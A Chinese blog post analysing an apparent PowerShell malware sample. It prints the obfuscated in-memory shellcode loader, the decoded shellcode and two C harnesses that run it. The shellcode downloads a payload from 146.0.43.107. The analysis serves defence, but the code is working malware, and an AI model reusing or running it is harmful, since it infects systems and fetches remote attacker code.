本文链接网址:http://blog.csdn.net/qq1084283172/article/details/45690529

一、事件回放

网络管理员在服务器上通过网络监控软件检测到,有程序在不断向外发包,并且ip地址显示国外的区域,经过相关安全工程师的分析和定位,最确定是微软操作系统上的Power Shell程序出现异常。发现的这个Power Shell程序和微软操作系统上的Power Shell程序不同,出现异常的这个Power Shell会不断的向外发包。经过该安全工程师的分析和反编译程序,最终得到了下面这段关键的代码,其中黄色部分的代码是最为关键的,后面会对这段代码进行解释和分析:

function eioVqZzdV {

Param ($eoSKcVTjfxS, $p0d9j)

$f4Al9fb6 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')
}).GetType('Microsoft.Win32.UnsafeNativeMethods')

return $f4Al9fb6.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($f4Al9fb6.GetMethod('GetModuleHandle')).Invoke($null, @($eoSKcVTjfxS)))), $p0d9j))

}

function mGIgrD {

Param (

[Parameter(Position = 0, Mandatory = $True)] [Type[]] $ejQ7pbH8K,

[Parameter(Position = 1)] [Type] $za4NhlFE = [Void]

)

$lqSy6La = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class,
Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])

$lqSy6La.DefineConstructor('RTSpecialName, HideBySig,
Public', [System.Reflection.CallingConventions]::Standard, $ejQ7pbH8K).SetImplementationFlags('Runtime,
Managed')

$lqSy6La.DefineMethod('Invoke', 'Public,
HideBySig, NewSlot, Virtual', $za4NhlFE, $ejQ7pbH8K).SetImplementationFlags('Runtime,
Managed')

return $lqSy6La.CreateType()

}

[Byte[]]$umdAM8XBH = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi

1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29

tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA

Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9

XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN

DMuMTA3AA==")

$ro8d50FQZ0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll VirtualAlloc), (mGIgrD @([IntPtr], [UInt32], [UInt32], [UInt32])
([IntPtr]))).Invoke([IntPtr]::Zero, $umdAM8XBH.Length,0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($umdAM8XBH, 0, $ro8d50FQZ0, $umdAM8XBH.length)

$mLkBWmZ3 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll CreateThread), (mGIgrD @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])
([IntPtr]))).Invoke([IntPtr]::Zero,0,$ro8d50FQZ0,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll WaitForSingleObject), (mGIgrD @([IntPtr], [Int32]))).Invoke($mLkBWmZ3,0xffffffff) | Out-Null

二、对反编译关键代码的注释

//Base64编码的字符串数组$umdAM8XBH

[Byte[]]$umdAM8XBH =[System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi

1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29

tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA

Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9

XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN

DMuMTA3AA==")

//调用kernel32.dll库的函数VirtualAlloc在进程堆上分配0x3000大小的内存空间,$ro8d50FQZ0保存申请内存空间的地址

$ro8d50FQZ0 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll VirtualAlloc), (mGIgrD @([IntPtr], [UInt32], [UInt32],[UInt32])
([IntPtr]))).Invoke([IntPtr]::Zero, $umdAM8XBH.Length,0x3000, 0x40)

//调用函数Copy从数组$umdAM8XBH中拷贝字符串到新申请的内存空间$ro8d50FQZ0中

[System.Runtime.InteropServices.Marshal]::Copy($umdAM8XBH, 0, $ro8d50FQZ0, $umdAM8XBH.length)

//调用kernel32.dll库中函数CreateThread创建线程,并且线程的回调函数的地址为数组$ro8d50FQZ0的字符串地址

$mLkBWmZ3 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll CreateThread), (mGIgrD @([IntPtr], [UInt32], [IntPtr],[IntPtr], [UInt32], [IntPtr])
([IntPtr]))).Invoke([IntPtr]::Zero,0,$ro8d50FQZ0,[IntPtr]::Zero,0,[IntPtr]::Zero)

//调用kernel32.dll库中的函数WaitForSingleObject等待线程的创建成功

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((eioVqZzdV kernel32.dll WaitForSingleObject), (mGIgrD @([IntPtr],[Int32]))).Invoke($mLkBWmZ3,0xffffffff) | Out-Null

二、黄色部分Base64字符串的解码

//很明显数组$umdAM8XBH中的字符是ShellCode代码但是需要先Base64解码:

[Byte[]]$umdAM8XBH =[System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi

1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6IAAAABNb3ppbGxhLzUuMCAoY29

tcGF0aWJsZTsgTVNJRSAxMC4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNi4wOyBUb3VjaDsgTUFTUEpTKQBYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYA

Fkx/1dXV1dRaDpWeaf/1et5WzHJUVFqA1FRaFAAAABTUGhXiZ/G/9XrYlkx0lJoAAJghFJSUlFSUGjrVS47/9WJxjH/V1dXV1ZoLQYYe//VhcB0RDH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9

XagdRVlBot1fgC//VvwAvAAA5x3S8Mf/rFetJ6Jn///8vaGZZbgAAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk1NTiedXaAAgAABTVmgSloni/9WFwHTNiwcBw4XAdeVYw+g3////MTQ2LjAuN

DMuMTA3AA==")

黄色部分的字符串的解码

Base64编码字符串在线解码的网址:http://www1.tc711.com/tool/BASE64.htm

1.Base64字符串解码成字符串--显然这种解码方式是不对的

2.其实这段Base64加密的编码解密出来是一段ShellCode也就是一段可执行代码不是一个Http的发送包。

char shellCode[] = 

"\xfc\xe8\x89\x00\x00\x00\x60\x89"

"\xe5\x31\xd2\x64\x8b\x52\x30\x8b" 

"\x52\x0c\x8b\x52\x14\x8b\x72\x28" 

"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1" 

"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" 

"\x8b\x52\x10\x8b\x42\x3c\x01\xd0" 

"\x8b\x40\x78\x85\xc0\x74\x4a\x01" 

"\xd0\x50\x8b\x48\x18\x8b\x58\x20" 

"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" 

"\x01\xd6\x31\xff\x31\xc0\xac\xc1" 

"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" 

"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2" 

"\x58\x8b\x58\x24\x01\xd3\x66\x8b" 

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 

"\x04\x8b\x01\xd0\x89\x44\x24\x24" 

"\x5b\x5b\x61\x59\x5a\x51\xff\xe0" 

"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" 

"\x68\x6e\x65\x74\x00\x68\x77\x69" 

"\x6e\x69\x54\x68\x4c\x77\x26\x07" 

"\xff\xd5\xe8\x80\x00\x00\x00\x4d" 

"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35" 

"\x2e\x30\x20\x28\x63\x6f\x6d\x70" 

"\x61\x74\x69\x62\x6c\x65\x3b\x20" 

"\x4d\x53\x49\x45\x20\x31\x30\x2e" 

"\x30\x3b\x20\x57\x69\x6e\x64\x6f" 

"\x77\x73\x20\x4e\x54\x20\x36\x2e" 

"\x32\x3b\x20\x57\x4f\x57\x36\x34" 

"\x3b\x20\x54\x72\x69\x64\x65\x6e" 

"\x74\x2f\x36\x2e\x30\x3b\x20\x54" 

"\x6f\x75\x63\x68\x3b\x20\x4d\x41" 

"\x53\x50\x4a\x53\x29\x00\x58\x58" 

"\x58\x58\x58\x58\x58\x58\x58\x58" 

"\x58\x58\x58\x58\x58\x58\x58\x58" 

"\x58\x58\x58\x58\x58\x58\x58\x58" 

"\x58\x58\x58\x58\x58\x58\x58\x58" 

"\x58\x58\x58\x58\x58\x58\x00\x59" 

"\x31\xff\x57\x57\x57\x57\x51\x68" 

"\x3a\x56\x79\xa7\xff\xd5\xeb\x79" 

"\x5b\x31\xc9\x51\x51\x6a\x03\x51" 

"\x51\x68\x50\x00\x00\x00\x53\x50" 

"\x68\x57\x89\x9f\xc6\xff\xd5\xeb" 

"\x62\x59\x31\xd2\x52\x68\x00\x02" 

"\x60\x84\x52\x52\x52\x51\x52\x50" 

"\x68\xeb\x55\x2e\x3b\xff\xd5\x89" 

"\xc6\x31\xff\x57\x57\x57\x57\x56" 

"\x68\x2d\x06\x18\x7b\xff\xd5\x85" 

"\xc0\x74\x44\x31\xff\x85\xf6\x74" 

"\x04\x89\xf9\xeb\x09\x68\xaa\xc5" 

"\xe2\x5d\xff\xd5\x89\xc1\x68\x45" 

"\x21\x5e\x31\xff\xd5\x31\xff\x57" 

"\x6a\x07\x51\x56\x50\x68\xb7\x57" 

"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00" 

"\x00\x39\xc7\x74\xbc\x31\xff\xeb" 

"\x15\xeb\x49\xe8\x99\xff\xff\xff" 

"\x2f\x68\x66\x59\x6e\x00\x00\x68" 

"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40" 

"\x68\x00\x10\x00\x00\x68\x00\x00" 

"\x40\x00\x57\x68\x58\xa4\x53\xe5" 

"\xff\xd5\x93\x53\x53\x89\xe7\x57" 

"\x68\x00\x20\x00\x00\x53\x56\x68" 

"\x12\x96\x89\xe2\xff\xd5\x85\xc0" 

"\x74\xcd\x8b\x07\x01\xc3\x85\xc0" 

"\x75\xe5\x58\xc3\xe8\x37\xff\xff" 

"\xff\x31\x34\x36\x2e\x30\x2e\x34" 

"\x33\x2e\x31\x30\x37\x00 ";

三、ShellCode代码行为的分析

1.编写测试测试程序,对ShellCode的行为进行分析

ShellCode测试程序1--TestCode:

// TestCode.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

char shellCode[] =

"\xfc\xe8\x89\x00\x00\x00\x60\x89"

"\xe5\x31\xd2\x64\x8b\x52\x30\x8b"

"\x52\x0c\x8b\x52\x14\x8b\x72\x28"

"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1"

"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"

"\x8b\x52\x10\x8b\x42\x3c\x01\xd0"

"\x8b\x40\x78\x85\xc0\x74\x4a\x01"

"\xd0\x50\x8b\x48\x18\x8b\x58\x20"

"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"

"\x01\xd6\x31\xff\x31\xc0\xac\xc1"

"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4"

"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"

"\x58\x8b\x58\x24\x01\xd3\x66\x8b"

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"

"\x04\x8b\x01\xd0\x89\x44\x24\x24"

"\x5b\x5b\x61\x59\x5a\x51\xff\xe0"

"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d"

"\x68\x6e\x65\x74\x00\x68\x77\x69"

"\x6e\x69\x54\x68\x4c\x77\x26\x07"

"\xff\xd5\xe8\x80\x00\x00\x00\x4d"

"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35"

"\x2e\x30\x20\x28\x63\x6f\x6d\x70"

"\x61\x74\x69\x62\x6c\x65\x3b\x20"

"\x4d\x53\x49\x45\x20\x31\x30\x2e"

"\x30\x3b\x20\x57\x69\x6e\x64\x6f"

"\x77\x73\x20\x4e\x54\x20\x36\x2e"

"\x32\x3b\x20\x57\x4f\x57\x36\x34"

"\x3b\x20\x54\x72\x69\x64\x65\x6e"

"\x74\x2f\x36\x2e\x30\x3b\x20\x54"

"\x6f\x75\x63\x68\x3b\x20\x4d\x41"

"\x53\x50\x4a\x53\x29\x00\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x00\x59"

"\x31\xff\x57\x57\x57\x57\x51\x68"

"\x3a\x56\x79\xa7\xff\xd5\xeb\x79"

"\x5b\x31\xc9\x51\x51\x6a\x03\x51"

"\x51\x68\x50\x00\x00\x00\x53\x50"

"\x68\x57\x89\x9f\xc6\xff\xd5\xeb"

"\x62\x59\x31\xd2\x52\x68\x00\x02"

"\x60\x84\x52\x52\x52\x51\x52\x50"

"\x68\xeb\x55\x2e\x3b\xff\xd5\x89"

"\xc6\x31\xff\x57\x57\x57\x57\x56"

"\x68\x2d\x06\x18\x7b\xff\xd5\x85"

"\xc0\x74\x44\x31\xff\x85\xf6\x74"

"\x04\x89\xf9\xeb\x09\x68\xaa\xc5"

"\xe2\x5d\xff\xd5\x89\xc1\x68\x45"

"\x21\x5e\x31\xff\xd5\x31\xff\x57"

"\x6a\x07\x51\x56\x50\x68\xb7\x57"

"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00"

"\x00\x39\xc7\x74\xbc\x31\xff\xeb"

"\x15\xeb\x49\xe8\x99\xff\xff\xff"

"\x2f\x68\x66\x59\x6e\x00\x00\x68"

"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40"

"\x68\x00\x10\x00\x00\x68\x00\x00"

"\x40\x00\x57\x68\x58\xa4\x53\xe5"

"\xff\xd5\x93\x53\x53\x89\xe7\x57"

"\x68\x00\x20\x00\x00\x53\x56\x68"

"\x12\x96\x89\xe2\xff\xd5\x85\xc0"

"\x74\xcd\x8b\x07\x01\xc3\x85\xc0"

"\x75\xe5\x58\xc3\xe8\x37\xff\xff"

"\xff\x31\x34\x36\x2e\x30\x2e\x34"

"\x33\x2e\x31\x30\x37\x00 ";

int main(int argc, char* argv[])

{

	__asm

	{

		lea eax, shellCode

		push eax

		ret

	}

	return 0;

}

ShellCode测试程序2--TestCode1:

// TestCode1.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

#include <windows.h>

char shellCode[] =

"\xfc\xe8\x89\x00\x00\x00\x60\x89"

"\xe5\x31\xd2\x64\x8b\x52\x30\x8b"

"\x52\x0c\x8b\x52\x14\x8b\x72\x28"

"\x0f\xb7\x4a\x26\x31\xff\x31\xc0"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1"

"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"

"\x8b\x52\x10\x8b\x42\x3c\x01\xd0"

"\x8b\x40\x78\x85\xc0\x74\x4a\x01"

"\xd0\x50\x8b\x48\x18\x8b\x58\x20"

"\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"

"\x01\xd6\x31\xff\x31\xc0\xac\xc1"

"\xcf\x0d\x01\xc7\x38\xe0\x75\xf4"

"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"

"\x58\x8b\x58\x24\x01\xd3\x66\x8b"

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"

"\x04\x8b\x01\xd0\x89\x44\x24\x24"

"\x5b\x5b\x61\x59\x5a\x51\xff\xe0"

"\x58\x5f\x5a\x8b\x12\xeb\x86\x5d"

"\x68\x6e\x65\x74\x00\x68\x77\x69"

"\x6e\x69\x54\x68\x4c\x77\x26\x07"

"\xff\xd5\xe8\x80\x00\x00\x00\x4d"

"\x6f\x7a\x69\x6c\x6c\x61\x2f\x35"

"\x2e\x30\x20\x28\x63\x6f\x6d\x70"

"\x61\x74\x69\x62\x6c\x65\x3b\x20"

"\x4d\x53\x49\x45\x20\x31\x30\x2e"

"\x30\x3b\x20\x57\x69\x6e\x64\x6f"

"\x77\x73\x20\x4e\x54\x20\x36\x2e"

"\x32\x3b\x20\x57\x4f\x57\x36\x34"

"\x3b\x20\x54\x72\x69\x64\x65\x6e"

"\x74\x2f\x36\x2e\x30\x3b\x20\x54"

"\x6f\x75\x63\x68\x3b\x20\x4d\x41"

"\x53\x50\x4a\x53\x29\x00\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x58\x58"

"\x58\x58\x58\x58\x58\x58\x00\x59"

"\x31\xff\x57\x57\x57\x57\x51\x68"

"\x3a\x56\x79\xa7\xff\xd5\xeb\x79"

"\x5b\x31\xc9\x51\x51\x6a\x03\x51"

"\x51\x68\x50\x00\x00\x00\x53\x50"

"\x68\x57\x89\x9f\xc6\xff\xd5\xeb"

"\x62\x59\x31\xd2\x52\x68\x00\x02"

"\x60\x84\x52\x52\x52\x51\x52\x50"

"\x68\xeb\x55\x2e\x3b\xff\xd5\x89"

"\xc6\x31\xff\x57\x57\x57\x57\x56"

"\x68\x2d\x06\x18\x7b\xff\xd5\x85"

"\xc0\x74\x44\x31\xff\x85\xf6\x74"

"\x04\x89\xf9\xeb\x09\x68\xaa\xc5"

"\xe2\x5d\xff\xd5\x89\xc1\x68\x45"

"\x21\x5e\x31\xff\xd5\x31\xff\x57"

"\x6a\x07\x51\x56\x50\x68\xb7\x57"

"\xe0\x0b\xff\xd5\xbf\x00\x2f\x00"

"\x00\x39\xc7\x74\xbc\x31\xff\xeb"

"\x15\xeb\x49\xe8\x99\xff\xff\xff"

"\x2f\x68\x66\x59\x6e\x00\x00\x68"

"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40"

"\x68\x00\x10\x00\x00\x68\x00\x00"

"\x40\x00\x57\x68\x58\xa4\x53\xe5"

"\xff\xd5\x93\x53\x53\x89\xe7\x57"

"\x68\x00\x20\x00\x00\x53\x56\x68"

"\x12\x96\x89\xe2\xff\xd5\x85\xc0"

"\x74\xcd\x8b\x07\x01\xc3\x85\xc0"

"\x75\xe5\x58\xc3\xe8\x37\xff\xff"

"\xff\x31\x34\x36\x2e\x30\x2e\x34"

"\x33\x2e\x31\x30\x37\x00 ";

int main(int argc, char* argv[])

{

	//创建ShellCode的线程

	HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)(int)&shellCode, NULL, 0, NULL);

	//等待线程的创建完成

	WaitForSingleObject(hThread, INFINITE);

	return 0;

}

2.  使用病毒监控软件MyMonitor对ShellCode的行为进行监控,情况如下:

创建文件C:\Documentsand Settings\Administrator\Local Settings\Temporary InternetFiles\Content.IE5\index.dat

创建文件C:\Documentsand Settings\Administrator\Cookies\index.dat

创建文件C:\Documentsand Settings\Administrator\Local Settings\History\ History.IE5\index.dat

创建文件C:\AUTOEXEC.BAT

创建文件C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\b7e3_appcompat.txt

链接外网146.0.43.107:80,远程读取该网站中的文件146.0.43.107/hfYn到本地文件中。

3. 使用OD对程序进行动态分析

ShellCode的汇编是经过人工刻意编写的,懒得分析,我想多活几年,只提供部分ShellCode的截图:

4.使用金山火眼对样本进行分析

分析结果的网址:

http://fireeye.ijinshan.com/analyse.html?md5=232ddb4b262057145ce0b8930738b7fb&sha1=39ec762b497c51a28acb7c334a123c89ebd944dd&type=1#full

四、在线病毒扫描对样本的检测结果

病毒检测报告结果的网址:

http://r.virscan.org/report/8cb8acd2f0bce2b3ee34bcffc5657c8d

笔记到此为止,欢迎高手拍砖砸死。

针对中国政府机构的准APT攻击样本Power Shell的ShellCode分析的更多相关文章

  1. 揭秘Patchwork APT攻击-恶意软件样本BADNEWS

    1.前言 在2016年左右研究人员发现一个与东南亚和中国南海问题的APT攻击,该APT攻击利用MS Offcie系列漏洞通过钓鱼邮件的形式欺骗受害者点击木马.以美国在内的各国政府和公司为目标发送了大量 ...

  2. &lt; APT 攻击&gt;看起来是 .PPT 附件,竟是 .SCR !!

    趋势科技以前在2013年下半年度目标攻击综合报告里指出,发现了好几起APT攻击-高级持续性渗透攻击 (Advanced Persistent Threat, APT) /目标攻击相关的攻击活动. 趋势 ...

  3. 利用WPS 2012/2013 0day针对中国政府部门的定向攻击

    今天早上,我们捕获到一个利用wps 2012/2013 0day针对中国政府部门的钓鱼邮件定向攻击事件. 邮件发件人以2014中国经济形势解析高层报告组委会 标题发出,附件为包含wps2012 0da ...

  4. APT攻击基础科普

    0x00 APT的历史起源背景 APT这个词汇最早起源于:2005年英国和美国的CERT组织发布了关于有针对性的社交工程电子邮件,放弃特洛伊木马以泄露敏感信息的第一个警告,尽管没有使用“APT”这个名 ...

  5. APT攻击将向云计算平台聚焦

    APT攻击作为一种高效.精确的网络攻击方式,在近几年被频繁用于各种网络攻击事件之中,并迅速成为企业信息安全最大的威胁之一. 近日,飞塔中国首席技术顾问X在谈及APT攻击时表示,随着云计算的不断发展普及 ...

  6. 从kill-chain的角度检测APT攻击

    前言 最近一直在考虑如何结合kill chain检测APT攻击.出发点是因为尽管APT是一种特殊.高级攻击手段,但是它还是会具有攻击的common feature,只要可以把握住共同特征,就能进行检测 ...

  7. 从防御者视角来看APT攻击

    前言 APT防御的重要性毋庸讳言,为了帮助各位师傅在防御方面建立一个总体认识,本文会将APT防御方法分为三类,分别是:监控.检测和缓解技术,并分别进行梳理,介绍分析代表性技术.这一篇分析现有的监控技术 ...

  8. 梭子鱼:APT攻击是一盘更大的棋吗?

    随着企业对IT的依赖越来越强,APT攻击可能会成为一种恶意打击竞争对手的手段.目前,APT攻击目标主要有政治和经济目的两大类.而出于经济目的而进行的APT攻击可以获取竞争对手的商业信息,也可使用竞争对 ...

  9. 饼干怪兽和APT攻击

    APT攻击就像一个孩子,你通过各种方式窃取他们的大脑要拿出饼干,为了防止恶意攻击,过失作为母亲未能发现和防止饼干盗窃贼如.于她仅仅监视厨房椅子.衣柜门或烤箱门的开启.建立起有效防御目标攻击与APT攻击 ...

随机推荐

  1. kubernets资源预留

    一.  Kubelet Node Allocatable Kubelet Node Allocatable用来为Kube组件和System进程预留资源,从而保证当节点出现满负荷时也能保证Kube和Sy ...

  2. 关于python中的[::-1],[:,:,::-1]的反转理解

    其实就是单纯的关于反转,我们只需要记住每一个列表的中间有两个冒号: 即[a: b:c],意思是从a到b,间隔是c,因为经常省略c,所以经常看到[a:b]. 一.在一维数据中的反转 import num ...

  3. ORM框架 和 面向对象编程

    ORM框架: 1.SQLAlchemy:  - 作用   1.提供简单的规则   2.自动转换成SQL语句  - DB first/code first   DB first: 手动创建数据库以及表  ...

  4. ubantu16与windows下——redis的安装与使用

      (1) 打开ubantu16,使用如下命令下载安装包 wget http://download.redis.io/releases/redis-2.8.3.tar.gz (2)解压缩命令: tar ...

  5. FreeBSD 12.2 阿里云镜像使用说明

    目前直接从阿里云 12.1 升级 12.2 会导致错误.镜像非本人制作.FreeBSD 12.2 阿里云镜像使用说明镜像下载地址: http://t.cn/A6taB5jO修改内容:对 /usr/sr ...

  6. 迷宫问题(DFS)

    声明:图片及内容基于https://www.bilibili.com/video/BV1oE41177wk?t=3245 问题及分析 8*8的迷宫,最外周是墙,0表示可以走,1表示不可以走 设置迷宫 ...

  7. 从零学脚手架(五)---react、browserslist

    如果此篇对您有所帮助,在此求一个star.项目地址: OrcasTeam/my-cli react react介绍 目前,国内主流的前端应用框架具有两个:vue.js和react.js,关于vue和r ...

  8. Jmeter 分布式架构和服务器性能监控解决方案

    在对项目做大并发性能测试时,常会碰到并发数比较大(比如需要支持10000并发),单台电脑的配置(CPU和内存)可能无法支持,这时可以使用Jmeter提供的分布式测试的功能来搭建分布式并发环境 . 一. ...

  9. P2014 选课 题解(树形DP)

    题目链接 P2014 选课 解题思路 树形动归,用\(f[i][j]\)表示以\(i\)为根,\(j\)个子节点(不包括自己)的最大学分 首先根据题意建图,用根节点\(0\)将森林连成树. 从根节点开 ...

  10. Shuffle Card HDU - 6707

    题目链接:https://vjudge.net/problem/HDU-6707 题意:给你一个数组a[ ](a[1]=1,a[2]=2.....a[n]=n),然后m次操作,每次把那个数拿到最前面去 ...